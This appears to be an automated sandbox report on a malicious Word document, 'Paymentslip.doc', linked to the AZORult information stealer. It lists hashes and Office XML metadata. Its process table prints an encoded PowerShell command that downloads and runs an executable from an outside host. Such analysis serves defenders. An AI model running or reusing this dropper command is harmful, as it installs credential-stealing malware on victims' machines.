File name: | Paymentslip.doc |
Full analysis: | https://app.any.run/tasks/819730f4-5b70-4857-a057-48d2c55f3b33 |
Verdict: | Malicious activity |
Threats: | AZORult can steal banking information, including passwords and credit card details, as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. |
Analysis date: | December 06, 2018, 01:09:19 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/xml |
File info: | XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators |
MD5: | BB8C9DB2445E7ECC4E4EEFC6ED1CB418 |
SHA1: | A5E390676EE75888494C3150ED913BF70882E9C6 |
SHA256: | FD24DE4D53E61EB7CD0C7B7B99552361DB2024B456568CB14ACCD6F59ADC3363 |
SSDEEP: | 6144:+M516FgSNHUfWFqupSBUKTrOwl0hsXUEM9y:z6FgZWB0nOwl0hsXUEuy |
.xml | | | Microsoft Office XML Flat File Format Word Document (ASCII) (43.7) |
---|---|---|
.rels | | | Open Office XML Relationships (28.2) |
.xml | | | Microsoft Office XML Flat File Format (ASCII) (20.8) |
.svg | | | Scalable Vector Graphics (var.3) (4.5) |
.xml | | | Generic XML (ASCII) (1.5) |
PackagePartXmlDataWebSettingsAllowPNG: | - |
---|---|
PackagePartXmlDataWebSettingsOptimizeForBrowser: | - |
PackagePartXmlDataWebSettingsIgnorable: | w14 w15 |
PackagePartXmlDataFontsFontSigCsb1: | 00000000 |
PackagePartXmlDataFontsFontSigCsb0: | 0000019F |
PackagePartXmlDataFontsFontSigUsb3: | 00000000 |
PackagePartXmlDataFontsFontSigUsb2: | 00000001 |
PackagePartXmlDataFontsFontSigUsb1: | 4000ACFF |
PackagePartXmlDataFontsFontSigUsb0: | E00002FF |
PackagePartXmlDataFontsFontPitchVal: | variable |
PackagePartXmlDataFontsFontFamilyVal: | swiss |
PackagePartXmlDataFontsFontCharsetVal: | 00 |
PackagePartXmlDataFontsFontPanose1Val: | 020F0502020204030204 |
PackagePartXmlDataFontsFontName: | Calibri |
PackagePartXmlDataFontsIgnorable: | w14 w15 |
PackagePartXmlDataCorePropertiesModified: | 2018:12:04 06:17:00Z |
PackagePartXmlDataCorePropertiesModifiedType: | dcterms:W3CDTF |
PackagePartXmlDataCorePropertiesCreated: | 2018:12:04 06:17:00Z |
PackagePartXmlDataCorePropertiesCreatedType: | dcterms:W3CDTF |
PackagePartXmlDataCorePropertiesRevision: | 1 |
PackagePartXmlDataCorePropertiesLastModifiedBy: | gtst1 |
PackagePartXmlDataCorePropertiesDescription: | - |
PackagePartXmlDataCorePropertiesKeywords: | - |
PackagePartXmlDataCorePropertiesCreator: | gtst1 |
PackagePartXmlDataCorePropertiesSubject: | - |
PackagePartXmlDataCorePropertiesTitle: | - |
PackagePartXmlDataStylesStyleTblPrTblCellMarRightType: | dxa |
PackagePartXmlDataStylesStyleTblPrTblCellMarRightW: | 108 |
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomType: | dxa |
PackagePartXmlDataStylesStyleTblPrTblCellMarBottomW: | - |
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftType: | dxa |
PackagePartXmlDataStylesStyleTblPrTblCellMarLeftW: | 108 |
PackagePartXmlDataStylesStyleTblPrTblCellMarTopType: | dxa |
PackagePartXmlDataStylesStyleTblPrTblCellMarTopW: | - |
PackagePartXmlDataStylesStyleTblPrTblIndType: | dxa |
PackagePartXmlDataStylesStyleTblPrTblIndW: | - |
PackagePartXmlDataStylesStyleUnhideWhenUsed: | - |
PackagePartXmlDataStylesStyleSemiHidden: | - |
PackagePartXmlDataStylesStyleUiPriorityVal: | 1 |
PackagePartXmlDataStylesStyleQFormat: | - |
PackagePartXmlDataStylesStyleNameVal: | Normal |
PackagePartXmlDataStylesStyleStyleId: | Normal |
PackagePartXmlDataStylesStyleDefault: | 1 |
PackagePartXmlDataStylesStyleType: | paragraph |
PackagePartXmlDataStylesLatentStylesLsdExceptionUnhideWhenUsed: | 1 |
PackagePartXmlDataStylesLatentStylesLsdExceptionSemiHidden: | 1 |
PackagePartXmlDataStylesLatentStylesLsdExceptionQFormat: | 1 |
PackagePartXmlDataStylesLatentStylesLsdExceptionUiPriority: | - |
PackagePartXmlDataStylesLatentStylesLsdExceptionName: | Normal |
PackagePartXmlDataStylesLatentStylesCount: | 371 |
PackagePartXmlDataStylesLatentStylesDefQFormat: | - |
PackagePartXmlDataStylesLatentStylesDefUnhideWhenUsed: | - |
PackagePartXmlDataStylesLatentStylesDefSemiHidden: | - |
PackagePartXmlDataStylesLatentStylesDefUIPriority: | 99 |
PackagePartXmlDataStylesLatentStylesDefLockedState: | - |
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLineRule: | auto |
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingLine: | 259 |
PackagePartXmlDataStylesDocDefaultsPPrDefaultPPrSpacingAfter: | 160 |
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangBidi: | ar-SA |
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangEastAsia: | en-US |
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrLangVal: | en-US |
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzCsVal: | 22 |
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrSzVal: | 22 |
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsCstheme: | minorBidi |
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsHAnsiTheme: | minorHAnsi |
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsEastAsiaTheme: | minorHAnsi |
PackagePartXmlDataStylesDocDefaultsRPrDefaultRPrRFontsAsciiTheme: | minorHAnsi |
PackagePartXmlDataStylesIgnorable: | w14 w15 |
PackagePartXmlDataPropertiesAppVersion: | 15 |
PackagePartXmlDataPropertiesHyperlinksChanged: | - |
PackagePartXmlDataPropertiesSharedDoc: | - |
PackagePartXmlDataPropertiesCharactersWithSpaces: | 2 |
PackagePartXmlDataPropertiesLinksUpToDate: | - |
PackagePartXmlDataPropertiesCompany: | - |
PackagePartXmlDataPropertiesScaleCrop: | - |
PackagePartXmlDataPropertiesParagraphs: | 1 |
PackagePartXmlDataPropertiesLines: | 1 |
PackagePartXmlDataPropertiesDocSecurity: | - |
PackagePartXmlDataPropertiesApplication: | Microsoft Office Word |
PackagePartXmlDataPropertiesCharacters: | 2 |
PackagePartXmlDataPropertiesWords: | - |
PackagePartXmlDataPropertiesPages: | 1 |
PackagePartXmlDataPropertiesTotalTime: | - |
PackagePartXmlDataPropertiesTemplate: | Normal |
PackagePartXmlDataPropertiesXmlns: | http://schemas.openxmlformats.org/officeDocument/2006/extended-properties |
PackagePartXmlDataSettingsDocIdVal: | {587BFEAE-043A-4C54-8D39-E3BC2D30D35D} |
PackagePartXmlDataSettingsChartTrackingRefBased: | - |
PackagePartXmlDataSettingsListSeparatorVal: | , |
PackagePartXmlDataSettingsDecimalSymbolVal: | . |
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapData: | 1 |
PackagePartXmlDataSettingsShapeDefaultsShapelayoutIdmapExt: | edit |
PackagePartXmlDataSettingsShapeDefaultsShapelayoutExt: | edit |
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsSpidmax: | 1026 |
PackagePartXmlDataSettingsShapeDefaultsShapedefaultsExt: | edit |
PackagePartXmlDataSettingsClrSchemeMappingFollowedHyperlink: | followedHyperlink |
PackagePartXmlDataSettingsClrSchemeMappingHyperlink: | hyperlink |
PackagePartXmlDataSettingsClrSchemeMappingAccent6: | accent6 |
PackagePartXmlDataSettingsClrSchemeMappingAccent5: | accent5 |
PackagePartXmlDataSettingsClrSchemeMappingAccent4: | accent4 |
PackagePartXmlDataSettingsClrSchemeMappingAccent3: | accent3 |
PackagePartXmlDataSettingsClrSchemeMappingAccent2: | accent2 |
PackagePartXmlDataSettingsClrSchemeMappingAccent1: | accent1 |
PackagePartXmlDataSettingsClrSchemeMappingT2: | dark2 |
PackagePartXmlDataSettingsClrSchemeMappingBg2: | light2 |
PackagePartXmlDataSettingsClrSchemeMappingT1: | dark1 |
PackagePartXmlDataSettingsClrSchemeMappingBg1: | light1 |
PackagePartXmlDataSettingsThemeFontLangVal: | en-US |
PackagePartXmlDataSettingsMathPrNaryLimVal: | undOvr |
PackagePartXmlDataSettingsMathPrIntLimVal: | subSup |
PackagePartXmlDataSettingsMathPrWrapIndentVal: | 1440 |
PackagePartXmlDataSettingsMathPrDefJcVal: | centerGroup |
PackagePartXmlDataSettingsMathPrRMarginVal: | - |
PackagePartXmlDataSettingsMathPrLMarginVal: | - |
PackagePartXmlDataSettingsMathPrDispDef: | - |
PackagePartXmlDataSettingsMathPrSmallFracVal: | - |
PackagePartXmlDataSettingsMathPrBrkBinSubVal: | -- |
PackagePartXmlDataSettingsMathPrBrkBinVal: | before |
PackagePartXmlDataSettingsMathPrMathFontVal: | Cambria Math |
PackagePartXmlDataSettingsRsidsRsidVal: | 002C3C24 |
PackagePartXmlDataSettingsRsidsRsidRootVal: | 007D1537 |
PackagePartXmlDataSettingsCompatCompatSettingVal: | 15 |
PackagePartXmlDataSettingsCompatCompatSettingUri: | http://schemas.microsoft.com/office/word |
PackagePartXmlDataSettingsCompatCompatSettingName: | compatibilityMode |
PackagePartXmlDataSettingsCharacterSpacingControlVal: | doNotCompress |
PackagePartXmlDataSettingsDefaultTabStopVal: | 720 |
PackagePartXmlDataSettingsZoomPercent: | 100 |
PackagePartXmlDataSettingsIgnorable: | w14 w15 |
PackagePartXmlDataVbaSuppDataMcdsMcdCmg: | 56 |
PackagePartXmlDataVbaSuppDataMcdsMcdBEncrypt: | 00 |
PackagePartXmlDataVbaSuppDataMcdsMcdName: | Project.KddmFc.f_GrZsRq5L9VLDbWySHE |
PackagePartXmlDataVbaSuppDataMcdsMcdMacroName: | PROJECT.KDDMFC.F_GRZSRQ5L9VLDBWYSHE |
PackagePartXmlDataVbaSuppDataDocEventsEventDocOpen: | - |
PackagePartXmlDataVbaSuppDataIgnorable: | w14 w15 wp14 |
PackagePartXmlDataThemeExtLstExtThemeFamilyVid: | {4A3C46E8-61CC-4603-A589-7422A47A8E4A} |
PackagePartXmlDataThemeExtLstExtThemeFamilyId: | {62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F} |
PackagePartXmlDataThemeExtLstExtThemeFamilyName: | Office Theme |
PackagePartXmlDataThemeExtLstExtUri: | {05A4C25C-085E-4340-85A3-A5531E510DB2} |
PackagePartXmlDataThemeExtraClrSchemeLst: | - |
PackagePartXmlDataThemeObjectDefaults: | - |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinScaled: | - |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillLinAng: | 5400000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrLumModVal: | 102000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrShadeVal: | 98000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrSatModVal: | 150000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrTintVal: | 93000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsSchemeClrVal: | phClr |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillGsLstGsPos: | - |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstGradFillRotWithShape: | 1 |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrSatModVal: | 170000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrTintVal: | 95000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeBgFillStyleLstSolidFillSchemeClrVal: | phClr |
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrAlphaVal: | 63000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwSrgbClrVal: | 000000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwRotWithShape: | - |
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwAlgn: | ctr |
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDir: | 5400000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwDist: | 19050 |
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLstOuterShdwBlurRad: | 57150 |
PackagePartXmlDataThemeThemeElementsFmtSchemeEffectStyleLstEffectStyleEffectLst: | - |
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnMiterLim: | 800000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnPrstDashVal: | solid |
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnSolidFillSchemeClrVal: | phClr |
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnAlgn: | ctr |
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCmpd: | sng |
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnCap: | flat |
PackagePartXmlDataThemeThemeElementsFmtSchemeLnStyleLstLnW: | 6350 |
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrShadeVal: | 100000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinScaled: | - |
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillLinAng: | 5400000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrTintVal: | 67000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrSatModVal: | 105000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrLumModVal: | 110000 |
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsSchemeClrVal: | phClr |
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillGsLstGsPos: | - |
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstGradFillRotWithShape: | 1 |
PackagePartXmlDataThemeThemeElementsFmtSchemeFillStyleLstSolidFillSchemeClrVal: | phClr |
PackagePartXmlDataThemeThemeElementsFmtSchemeName: | Office |
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontTypeface: | MS 明朝 |
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontFontScript: | Jpan |
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontCsTypeface: | - |
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontEaTypeface: | - |
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinPanose: | 020F0502020204030204 |
PackagePartXmlDataThemeThemeElementsFontSchemeMinorFontLatinTypeface: | Calibri |
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontTypeface: | MS ゴシック |
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontFontScript: | Jpan |
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontCsTypeface: | - |
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontEaTypeface: | - |
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinPanose: | 020F0302020204030204 |
PackagePartXmlDataThemeThemeElementsFontSchemeMajorFontLatinTypeface: | Calibri Light |
PackagePartXmlDataThemeThemeElementsFontSchemeName: | Office |
PackagePartXmlDataThemeThemeElementsClrSchemeFolHlinkSrgbClrVal: | 954F72 |
PackagePartXmlDataThemeThemeElementsClrSchemeHlinkSrgbClrVal: | 0563C1 |
PackagePartXmlDataThemeThemeElementsClrSchemeAccent6SrgbClrVal: | 70AD47 |
PackagePartXmlDataThemeThemeElementsClrSchemeAccent5SrgbClrVal: | 4472C4 |
PackagePartXmlDataThemeThemeElementsClrSchemeAccent4SrgbClrVal: | FFC000 |
PackagePartXmlDataThemeThemeElementsClrSchemeAccent3SrgbClrVal: | A5A5A5 |
PackagePartXmlDataThemeThemeElementsClrSchemeAccent2SrgbClrVal: | ED7D31 |
PackagePartXmlDataThemeThemeElementsClrSchemeAccent1SrgbClrVal: | 5B9BD5 |
PackagePartXmlDataThemeThemeElementsClrSchemeLt2SrgbClrVal: | E7E6E6 |
PackagePartXmlDataThemeThemeElementsClrSchemeDk2SrgbClrVal: | 44546A |
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrLastClr: | FFFFFF |
PackagePartXmlDataThemeThemeElementsClrSchemeLt1SysClrVal: | window |
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrLastClr: | 000000 |
PackagePartXmlDataThemeThemeElementsClrSchemeDk1SysClrVal: | windowText |
PackagePartXmlDataThemeThemeElementsClrSchemeName: | Office |
PackagePartXmlDataThemeName: | Office Theme |
PackagePartCompression: | store |
PackagePartBinaryData: | (Binary data 130316 bytes, use -b option to extract) |
PackagePartXmlDataDocumentBodySectPrDocGridLinePitch: | 360 |
PackagePartXmlDataDocumentBodySectPrColsSpace: | 720 |
PackagePartXmlDataDocumentBodySectPrPgMarGutter: | - |
PackagePartXmlDataDocumentBodySectPrPgMarFooter: | 720 |
PackagePartXmlDataDocumentBodySectPrPgMarHeader: | 720 |
PackagePartXmlDataDocumentBodySectPrPgMarLeft: | 1440 |
PackagePartXmlDataDocumentBodySectPrPgMarBottom: | 1440 |
PackagePartXmlDataDocumentBodySectPrPgMarRight: | 1440 |
PackagePartXmlDataDocumentBodySectPrPgMarTop: | 1440 |
PackagePartXmlDataDocumentBodySectPrPgSzH: | 15840 |
PackagePartXmlDataDocumentBodySectPrPgSzW: | 12240 |
PackagePartXmlDataDocumentBodySectPrRsidR: | 002C3C24 |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomAvLst: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrPrstGeomPrst: | rect |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCy: | 4649492 |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmExtCx: | 4649492 |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffY: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicSpPrXfrmOffX: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillStretchFillRect: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipExtLstExtUri: | {28A0092B-C50C-407E-A947-70E740481C1C} |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicBlipFillBlipEmbed: | rId5 |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPicPr: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrName: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataPicNvPicPrCNvPrId: | 1 |
PackagePartXmlDataDocumentBodyPRDrawingInlineGraphicGraphicDataUri: | http://schemas.openxmlformats.org/drawingml/2006/picture |
PackagePartXmlDataDocumentBodyPRDrawingInlineCNvGraphicFramePr: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrName: | Picture 1 |
PackagePartXmlDataDocumentBodyPRDrawingInlineDocPrId: | 1 |
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentB: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentR: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentT: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineEffectExtentL: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCy: | 4649492 |
PackagePartXmlDataDocumentBodyPRDrawingInlineExtentCx: | 4649492 |
PackagePartXmlDataDocumentBodyPRDrawingInlineDistR: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineDistL: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineDistB: | - |
PackagePartXmlDataDocumentBodyPRDrawingInlineDistT: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomAvLst: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrPrstGeomPrst: | rect |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCy: | 4649492 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmExtCx: | 4649492 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffY: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicSpPrXfrmOffX: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillStretchFillRect: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUseLocalDpiVal: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipExtLstExtUri: | {28A0092B-C50C-407E-A947-70E740481C1C} |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicBlipFillBlipEmbed: | rId5 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPicPr: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrName: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataPicNvPicPrCNvPrId: | 2 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorGraphicGraphicDataUri: | http://schemas.openxmlformats.org/drawingml/2006/picture |
PackagePartXmlDataDocumentBodyPRDrawingAnchorCNvGraphicFramePr: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrName: | Picture 2 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorDocPrId: | 2 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorWrapNone: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentB: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentR: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentT: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorEffectExtentL: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCy: | 4649492 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorExtentCx: | 4649492 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVPosOffset: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionVRelativeFrom: | paragraph |
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHPosOffset: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorPositionHRelativeFrom: | column |
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosY: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePosX: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorAllowOverlap: | 1 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorLayoutInCell: | 1 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorLocked: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorBehindDoc: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorRelativeHeight: | 251658240 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorSimplePos: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistR: | 114300 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistL: | 114300 |
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistB: | - |
PackagePartXmlDataDocumentBodyPRDrawingAnchorDistT: | - |
PackagePartXmlDataDocumentBodyPRRPrNoProof: | - |
PackagePartXmlDataDocumentBodyPBookmarkEndId: | - |
PackagePartXmlDataDocumentBodyPBookmarkStartName: | _GoBack |
PackagePartXmlDataDocumentBodyPBookmarkStartId: | - |
PackagePartXmlDataDocumentBodyPRsidRDefault: | 007D1537 |
PackagePartXmlDataDocumentBodyPRsidR: | 002C3C24 |
PackagePartXmlDataDocumentIgnorable: | w14 w15 wp14 |
PackagePartXmlDataRelationshipsRelationshipTarget: | docProps/app.xml |
PackagePartXmlDataRelationshipsRelationshipType: | http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties |
PackagePartXmlDataRelationshipsRelationshipId: | rId3 |
PackagePartXmlDataRelationshipsXmlns: | http://schemas.openxmlformats.org/package/2006/relationships |
PackagePartPadding: | 512 |
PackagePartContentType: | application/vnd.openxmlformats-package.relationships+xml |
PackagePartName: | /_rels/.rels |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3464 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Paymentslip.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2580 | "C:\Windows\System32\cmd.exe" /C PoWerSHeLl -En ZgB1AG4AYwB0AGkAbwBuACAAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApAHsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACAAJABjADcAVwBBAHMAbgBBADMAOABVAGIANgBvAE8AZwBpAEMASQB2AGoAUgBFAEgASgBOAHIAYQBlACAALAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBjAG8AbQAgAFMAaABlAGwAbAAuAEEAcABwAGwAaQBjAGEAdABpAG8AbgApAC4AUwBoAGUAbABsAEUAeABlAGMAdQB0AGUAKAAgACQAVwBUAE4AOQBfAGUAeABUAEwANABzAG0ATgB4AFQAQgBwAHkAZwBuAFAAegBmAFAAIAApADsAIAB9AA0ACgB0AHIAeQB7AA0ACgANAAoAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBHAGUAdABGAG8AbABkAGUAcgBQAGEAdABoACgAJwBNAHkARABvAGMAdQBtAGUAbgB0AHMAJwApACsAJwBcAFcAaQBuAGQAbwB3AHMAVQBwAGQAYQB0AGUALgBlAHgAZQAnADsADQAKAHgANQBwAE4ASgBaAFEAUgBqADYAYgBRAFAAcQBTAFgASQB1AE0ANAB4AFoAagBaAE8AXwA0ACAAJwBoAHQAdABwADoALwAvAGgAbwBzAHQALgB3AG8AcgBrAHMAawBpAGwAbABzAHcAZQBiAC4AbgBlAHQALwB+AG8AZAB5AHMAcwBlAHkALwByAG8AeQB0AC8AQwBIAEkAQgBCAEIALgBlAHgAZQAnACAAJABvAHcASgBSAEQATwBFAGsARABqAGwAdwA1AGkAUQBjADYAOwANAAoAJAB2AE4AdQBHAEwAYQB3AF8AYwBvAE4AWABCAEEAMwB3ADYAVQBNADQAcABoAHIAYgBNADcAdQB4AD0AJABlAG4AdgA6AEEAcABwAGQAYQB0AGEAKwAnAFwAVwBpAG4AZABvAHcAcwBVAHAAZABhAHQAZQAuAGUAeABlACcAOwANAAoAeAA1AHAATgBKAFoAUQBSAGoANgBiAFEAUABxAFMAWABJAHUATQA0AHgAWgBqAFoATwBfADQAIAAnAGgAdAB0AHAAOgAvAC8AaABvAHMAdAAuAHcAbwByAGsAcwBrAGkAbABsAHMAdwBlAGIALgBuAGUAdAAvAH4AbwBkAHkAcwBzAGUAeQAvAHIAbwB5AHQALwBDAEgASQBCAEIAQgAuAGUAeABlACcAIAAkAHYATgB1AEcATABhAHcAXwBjAG8ATgBYAEIAQQAzAHcANgBVAE0ANABwAGgAcgBiAE0ANwB1AHgAOwANAAoADQAKAH0AYwBhAHQAYwBoAHsAfQA= | C:\Windows\System32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
